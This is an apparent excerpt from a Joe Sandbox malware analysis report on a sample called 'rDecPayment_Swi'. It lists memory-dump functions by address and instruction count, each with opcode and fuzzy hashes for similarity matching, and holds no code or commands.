                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9c192f3a16c89fdf24bc4912fb4e3649180f07f8da7e5e99dd2f3ec6dd53148
                                            • Instruction ID: 2fd8e21e08086d28c330d1a0126cf4e28ae7501e7bbb7467ecbf045ea8d5b433
                                            • Opcode Fuzzy Hash: c9c192f3a16c89fdf24bc4912fb4e3649180f07f8da7e5e99dd2f3ec6dd53148
                                            • Instruction Fuzzy Hash: 5421EE74E00269DFDF60DF98D844BEDBBB1BB48310F0095AAD949A7281DB305A85CF61
                                            Function 062114B0 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c41d8506c01f2dbb2e876a62dfcded0c7565092d7854b17fc19a7edd305ab9d
                                            • Instruction ID: 3191c38b60f8ea858e122edb248e843803ab82016040ff6d2391ad8d5a34feea
                                            • Opcode Fuzzy Hash: 6c41d8506c01f2dbb2e876a62dfcded0c7565092d7854b17fc19a7edd305ab9d
                                            • Instruction Fuzzy Hash: 2121D374A152698FCB64DF28C945B89B7B1FB49300F0085EAE84DB7784DB749E80CF41
                                            Function 0622F110 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db323426e35cdaba078be3df8ee05df6c68e0c8062c955e110f4b7680b55680d
                                            • Instruction ID: 3458ac149454c8073adc7f7d52f31e4b3ea041f8bd82301dd56390b780bd5b7d
                                            • Opcode Fuzzy Hash: db323426e35cdaba078be3df8ee05df6c68e0c8062c955e110f4b7680b55680d
                                            • Instruction Fuzzy Hash: 6C11F7B4E0020A9FCB48DFA9D9457AEBBF5FF88300F10846A9818A7355DA349A41CB91
                                            Function 06213712 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fec5b1b6486e6ea7d8cae65623ab971a4e0d1f09dc09541d1435719de6c4bfb7
                                            • Instruction ID: 729713531a41352e78ebb5d8ab875e50232e1b4ae3fb296e42b280aca62b191d
                                            • Opcode Fuzzy Hash: fec5b1b6486e6ea7d8cae65623ab971a4e0d1f09dc09541d1435719de6c4bfb7
                                            • Instruction Fuzzy Hash: 5D21C474A1022A8FCB64DF18C885BD9B7B1FB49300F1081EAE989A7744EB745EC1CF01
                                            Function 05E32280 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d943e0d4fb8699583e580a4c1fc710d7b6bfe7d41e2566fb15edf43737a6b9a
                                            • Instruction ID: 0e30dee0baa503d44d885ac11b273f1d40e038ee75f6d888bfb2074e7dab8cb3
                                            • Opcode Fuzzy Hash: 6d943e0d4fb8699583e580a4c1fc710d7b6bfe7d41e2566fb15edf43737a6b9a
                                            • Instruction Fuzzy Hash: 49018B763042009FD7008F6AEC88A8A7BA9FF89734B11406AFA8087721CA34D810CB60
                                            Function 05E57CC0 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4fcade72fee0600edc2cac2f2448b5d8d8bd3b135c99c99206b54a37da59620
                                            • Instruction ID: 2e2e397e412f5fc1727678a00420fabbb6bfbce6f45dff6439a4908b916accaa
                                            • Opcode Fuzzy Hash: a4fcade72fee0600edc2cac2f2448b5d8d8bd3b135c99c99206b54a37da59620
                                            • Instruction Fuzzy Hash: E40129B4E0520ACFDB54CFBAC8412AEBFF2FB89310F14956AC848A2204E7354581CF80
                                            Function 05E3EA40 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e12b5ed7948f4ce7b161729b57c5fa91394caafedf301ba0bd9a44c8c4cb1c2
                                            • Instruction ID: 0d8ad271dd177c085f88fa68a5ef7639940f824e210fb4e9e266c46c05ef6268
                                            • Opcode Fuzzy Hash: 9e12b5ed7948f4ce7b161729b57c5fa91394caafedf301ba0bd9a44c8c4cb1c2
                                            • Instruction Fuzzy Hash: 45018F35300610DFD3189B29D459A5ABBABEFCC710B10852AF9068B354CF75EC02CBE1
                                            Function 05E3B428 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7103b08fca86036c2a29ea5b284746be9f2a5665a5b93c999c8813fe4850eb
                                            • Instruction ID: 2ad7362aff4e2c624870a0df28ffb603677cb334cde024161738a3aed92e85ee
                                            • Opcode Fuzzy Hash: 6c7103b08fca86036c2a29ea5b284746be9f2a5665a5b93c999c8813fe4850eb
                                            • Instruction Fuzzy Hash: E4F0F632710108ABDB145A19D8459EAF7BEEB8C224F048026F91AC7310EE709D16C791
                                            Function 05E30D71 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cad3b1d58396a72f7519c4ceb2ef4678283c084c3a9e903b22434fe486e83763
                                            • Instruction ID: 656410881b3cae68709f867947260d58ee1cc7a3fec508e1028f3374571ebd68
                                            • Opcode Fuzzy Hash: cad3b1d58396a72f7519c4ceb2ef4678283c084c3a9e903b22434fe486e83763
                                            • Instruction Fuzzy Hash: 93016230A11209EFDB40EFA9E942B9D7BBAEF88304F5081A9E408D7344DE316E009B91
                                            Function 05E57801 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adbbc4ecf270b8fac4170c00a0ac70e5bb60900115f0bb0d696a617bb05bf804
                                            • Instruction ID: 86ad5054d3d09c33db55fdbc364af812a62fa0e840d20ee2b159a8d0bcfa289b
                                            • Opcode Fuzzy Hash: adbbc4ecf270b8fac4170c00a0ac70e5bb60900115f0bb0d696a617bb05bf804
                                            • Instruction Fuzzy Hash: A20124B0D09249DFCB55CFB8D9043AEBBB0EB09305F2045EAD849E3281E6394A15CBA1
                                            Function 05E3E7C8 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9d08e43464d427ffe6125cc894d16e9e70f051c3016fd49ed1ac1bf163e47f8
                                            • Instruction ID: 92b32c88db07bec7de62e124fdfc335acbf5c56562157d24ac09bbe05817154e
                                            • Opcode Fuzzy Hash: a9d08e43464d427ffe6125cc894d16e9e70f051c3016fd49ed1ac1bf163e47f8
                                            • Instruction Fuzzy Hash: C8018C35304300DFD3059B29D859A2A7BBAFF89621F0880AAF986CB361CA31DC01CB60
                                            Function 05E316D3 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e41182fb98b135d2cc9607a5a12c99323bebf936396973da30c4c6f11f4585b
                                            • Instruction ID: 468521b1e5edb7da0b286e05461071e63a2d178e144aec0c0b1118dd8a8d5092
                                            • Opcode Fuzzy Hash: 9e41182fb98b135d2cc9607a5a12c99323bebf936396973da30c4c6f11f4585b
                                            • Instruction Fuzzy Hash: 80F02B33B442109FF31886599815B5BFBAAEBC9720F18447EE505DB350CA71EC40C390
                                            Function 05E3EA50 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a2cdb50c33dbe0b8928e4b05705077b2e0836c2e25fd4ba176c3592da3c4a915
                                            • Instruction ID: b45a64521327ef6d3390e5b1b20b4654c0a8834a25a93662354cd524362d716c
                                            • Opcode Fuzzy Hash: a2cdb50c33dbe0b8928e4b05705077b2e0836c2e25fd4ba176c3592da3c4a915
                                            • Instruction Fuzzy Hash: 78018135300510DFD3199B29D45896ABBABEFCC711B10852AF9068B794CF75ED02CBD1
                                            Function 05E31738 Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbff6926bcff750fb075b6b75e33934c79af57ebb09b065ad92ad8673c6616f0
                                            • Instruction ID: a955fd0c0c6930507641bc52f38191c2e636359234a6b4f30961ba997c7c59f6
                                            • Opcode Fuzzy Hash: dbff6926bcff750fb075b6b75e33934c79af57ebb09b065ad92ad8673c6616f0
                                            • Instruction Fuzzy Hash: 76F02B73B0D2914FE32A47785C25365AFA29FD7205F0C40EFD0828F3A1DA968802C350
                                            Function 05E316E0 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92a4de3ddbe3d78b4719c12138cbe2ba5384eab2384593ceebdb1e58f82cf59d
                                            • Instruction ID: e6ba1c751a685f27f7244e28ab54de2fbf7e3d94807d4e528e671dc52ead6d7d
                                            • Opcode Fuzzy Hash: 92a4de3ddbe3d78b4719c12138cbe2ba5384eab2384593ceebdb1e58f82cf59d
                                            • Instruction Fuzzy Hash: DBF0E936B442115FE71886199815B6BFBAAEBC9721F18407EE5069B390DB72EC41C394
                                            Function 05E53221 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae74b5662cbf9f09e5dbf56f2412223d6bfd71ab4351df86a8205edbdc06671d
                                            • Instruction ID: e79dca3bf192ac131a99f7ca96dfd66e3273a5b5081a25b3f38ef61692a70509
                                            • Opcode Fuzzy Hash: ae74b5662cbf9f09e5dbf56f2412223d6bfd71ab4351df86a8205edbdc06671d
                                            • Instruction Fuzzy Hash: 4EF01D78905248FFC780CFA9D805AADBBF8BB89350F04C59AAD5892241D6359A11EF50
                                            Function 05E3E7D8 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 021a68c221809edc8f42a39ee9a10afbf62cc4049940d38a8a61c8f9b66223ee
                                            • Instruction ID: e9616b3b0328baaa6f294dbc8bb1bbd162a901677380e0c94359fbc29cd24ede
                                            • Opcode Fuzzy Hash: 021a68c221809edc8f42a39ee9a10afbf62cc4049940d38a8a61c8f9b66223ee
                                            • Instruction Fuzzy Hash: 84F05E35310200DFD304DB19D458E2A77AAEFC8721B148469F946CB360CA31EC42CB90
                                            Function 05E3FED7 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f770f25ae0c1eb43a47e21db3c9eb2ad1cc069b6d8fbf730d191179ec09e9777
                                            • Instruction ID: 0e6bb03f77f05b27bdd9ca23ae9ed82a7caf8bfcafeaba03082c6826b0ab542c
                                            • Opcode Fuzzy Hash: f770f25ae0c1eb43a47e21db3c9eb2ad1cc069b6d8fbf730d191179ec09e9777
                                            • Instruction Fuzzy Hash: 4EF03A34D09248AFC745DFA8D844AEDBBB4AB49200F10C1DAD85597352D6359A11CF51
                                            Function 05E3A838 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b65b1efd875feb3785ddf073eb5f9327d2d9be0dc92257684c288181e5ebb3d7
                                            • Instruction ID: 4440af89e2160a6fdc96cb855dca0e30b51a4d5a644537abca2dab1105b1f3fb
                                            • Opcode Fuzzy Hash: b65b1efd875feb3785ddf073eb5f9327d2d9be0dc92257684c288181e5ebb3d7
                                            • Instruction Fuzzy Hash: 5DE0683270911387F724101E7C8A76AD5ABEBC1A18F90423EB586C7344D964CC42C281
                                            Function 05E33990 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c21d87f73c30b55173b84fff8da0229f0145b5b92045228871d57dd2efb5a552
                                            • Instruction ID: 37840d68c13163737c5fae6e8ee63b01526656a2b94d830033ed189d40ef7808
                                            • Opcode Fuzzy Hash: c21d87f73c30b55173b84fff8da0229f0145b5b92045228871d57dd2efb5a552
                                            • Instruction Fuzzy Hash: 4AF08971A18608EFEB05CB69D4497DD7FF7EF84215F18809AE04597294DB740685C784
                                            Function 05E3A888 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8533b18f9f47ddc5c2411250f5a0d0130c87ac7ae615800556050fe0cb870f10
                                            • Instruction ID: 4f12262865bc56223fadd542532d00adce36e3fb966ba3953c797b1829c8ea72
                                            • Opcode Fuzzy Hash: 8533b18f9f47ddc5c2411250f5a0d0130c87ac7ae615800556050fe0cb870f10
                                            • Instruction Fuzzy Hash: 84E030312003059BD7159E6EE845E8BFB9FEFC4364B14C636E10A87229CE78E8098790
                                            Function 05E586F3 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b35f7b697af0fe327c0fe1a326da2d304932e8f47505c2ab7e152e7efb59aac
                                            • Instruction ID: 75b45695596bdca0ad6ed7b6912e3f2be1b9c44e4a1006cda31b020cc52e1cd1
                                            • Opcode Fuzzy Hash: 7b35f7b697af0fe327c0fe1a326da2d304932e8f47505c2ab7e152e7efb59aac
                                            • Instruction Fuzzy Hash: B0113974A02628CFDBA4CF28DD587DABBB0FB49346F0050E9988EA2244DB355EC0CF01
                                            Function 05E5029B Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 052b3bc50177865183767e3a5851cfcbb2d07b0f88cc0805db277b6b130050be
                                            • Instruction ID: 3ff4d22899677426e4d192dc38ac9ccb351483a99c61060c1c68537a899ce307
                                            • Opcode Fuzzy Hash: 052b3bc50177865183767e3a5851cfcbb2d07b0f88cc0805db277b6b130050be
                                            • Instruction Fuzzy Hash: 0801F274A14328DFEB65CF64D998B9DB7B2BF05314F0011D9E989A2280C7745E85CF02
                                            Function 05E53230 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cbe52742952932ed9a759b964d46cad766b37159d23de013785f78762c7ae2a8
                                            • Instruction ID: 4b724794f68be236a3691480b4b5e364326eef10a2f25223f40e9b265dcee4d3
                                            • Opcode Fuzzy Hash: cbe52742952932ed9a759b964d46cad766b37159d23de013785f78762c7ae2a8
                                            • Instruction Fuzzy Hash: ECF01C74D08248EFCB84DFA9C840AADBBF9AB8D310F14D5AAAC98D3341D6359A11DF50
                                            Function 05E305B3 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14c5c6786021c3b3fda01edfe28a3a6831efb7262622a27946478d1f2228114d
                                            • Instruction ID: f405662be882d16aefa2756b757e5a94b8a7e3a5788d8283292f79c0bfaf00da
                                            • Opcode Fuzzy Hash: 14c5c6786021c3b3fda01edfe28a3a6831efb7262622a27946478d1f2228114d
                                            • Instruction Fuzzy Hash: A0F01574D04208EFC794DFA8D44969CBBF5EB88304F10C0AA9898A3341DA36AA01DF40
                                            Function 05E3A898 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90adcdae5c529be66f7fd1ecd7356ebee33bedf0b1a36a1badd71c28708e87fb
                                            • Instruction ID: d4dc5f603de8bce409eae5c8d850651f6b3e5b6e72390724ac256b62c4456f19
                                            • Opcode Fuzzy Hash: 90adcdae5c529be66f7fd1ecd7356ebee33bedf0b1a36a1badd71c28708e87fb
                                            • Instruction Fuzzy Hash: 67E01A312002059BC7159E6EF884C8BFB9EEEC4264710CA3AE10A87229DE74ED0AC690
                                            Function 05E30110 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a9ef622758a5017c79846007635f8e1bd674e064079399b9eb256cb494b11c9
                                            • Instruction ID: 23698745371e0585a41a2106d4db51663e4c1d3b5b6eaaf0047ff10a9249fe8a
                                            • Opcode Fuzzy Hash: 3a9ef622758a5017c79846007635f8e1bd674e064079399b9eb256cb494b11c9
                                            • Instruction Fuzzy Hash: DDE06D34508208EFCB04CF98E905B99BB75FB45318F10C0A9E88527301CB329D52DB40
                                            Function 05E30DB8 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de3f06943521c6d8a36a838f957c92d57d5b90be232cd2df57e32c890b4f7fe7
                                            • Instruction ID: dbe84cea7863ef484ee4ff5bc3d6518362139745f9cadca8f2aba96b114606b6
                                            • Opcode Fuzzy Hash: de3f06943521c6d8a36a838f957c92d57d5b90be232cd2df57e32c890b4f7fe7
                                            • Instruction Fuzzy Hash: 2EE04830511209EFDB44EFA9FD45B5D777AEF85304F10C16EE40497241DE355E009B51
                                            Function 05E3FEE8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ebc7ba3319d30a8eac70fad594949127a4d35750a8927f8340f9888f631b1a2
                                            • Instruction ID: ef4b14678e1c752efcf533609f2b6e3c2e998353e91385abcc3b98ac1524852c
                                            • Opcode Fuzzy Hash: 0ebc7ba3319d30a8eac70fad594949127a4d35750a8927f8340f9888f631b1a2
                                            • Instruction Fuzzy Hash: 82E0C274E09208EFCB44DFA8D845AACBBF5EB89314F10C1AA9C59A3341D6369A51DF80
                                            Function 05E358F8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea04c945b9987a94c7134b414f8cf4f73e2ee07bce3fdabb4f375dab26f4f372
                                            • Instruction ID: be57501cb3d3b46eac6d55170ca15143e326b0fdb9d5aaad07812df9ba6823f5
                                            • Opcode Fuzzy Hash: ea04c945b9987a94c7134b414f8cf4f73e2ee07bce3fdabb4f375dab26f4f372
                                            • Instruction Fuzzy Hash: 8FE02630740304CBEB10A168590ABA233DA9B49224F90186796C64F380E9A1D801C761
                                            Function 06225A58 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e45c6e6bbc302475eb99aec137cab2001ce71b77466aa8c3e9965d233d76e8bb
                                            • Instruction ID: df01ea79cd588a2a838fb139ea0b81d9c9acfe1a3daad452e884fc3e09ab3bfd
                                            • Opcode Fuzzy Hash: e45c6e6bbc302475eb99aec137cab2001ce71b77466aa8c3e9965d233d76e8bb
                                            • Instruction Fuzzy Hash: 6EE0ED74D15208FFCB94DFA8D8456ACFBF5EB48310F10C1AA9C49A3341D6369A51DF91
                                            Function 0622A0F8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e45c6e6bbc302475eb99aec137cab2001ce71b77466aa8c3e9965d233d76e8bb
                                            • Instruction ID: ea481d5033228fb3a30a1b8013207f30b7b0b533a9e98ab0b63e4e889e58adfc
                                            • Opcode Fuzzy Hash: e45c6e6bbc302475eb99aec137cab2001ce71b77466aa8c3e9965d233d76e8bb
                                            • Instruction Fuzzy Hash: 7BE0ED74D15208EFCB84DFA8D44569CFBF5EB48310F10C1AADC4893351D6369A51DF80
                                            Function 05E305C0 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b50ed3df375021e12a8daf96d5765b5f9eee0f7439109595a6aaca4e1555fe9
                                            • Instruction ID: fbf1dcda5bbc1798a4171b98bb7350908cacb083727213bae6b0c11db0d657b0
                                            • Opcode Fuzzy Hash: 7b50ed3df375021e12a8daf96d5765b5f9eee0f7439109595a6aaca4e1555fe9
                                            • Instruction Fuzzy Hash: F7E0E574E05208EFCB94DFA8D4496ACBBF5FB88304F10C1AA9899E3341D6369A01CF40
                                            Function 05E30400 Relevance: .0, Instructions: 22COMMON
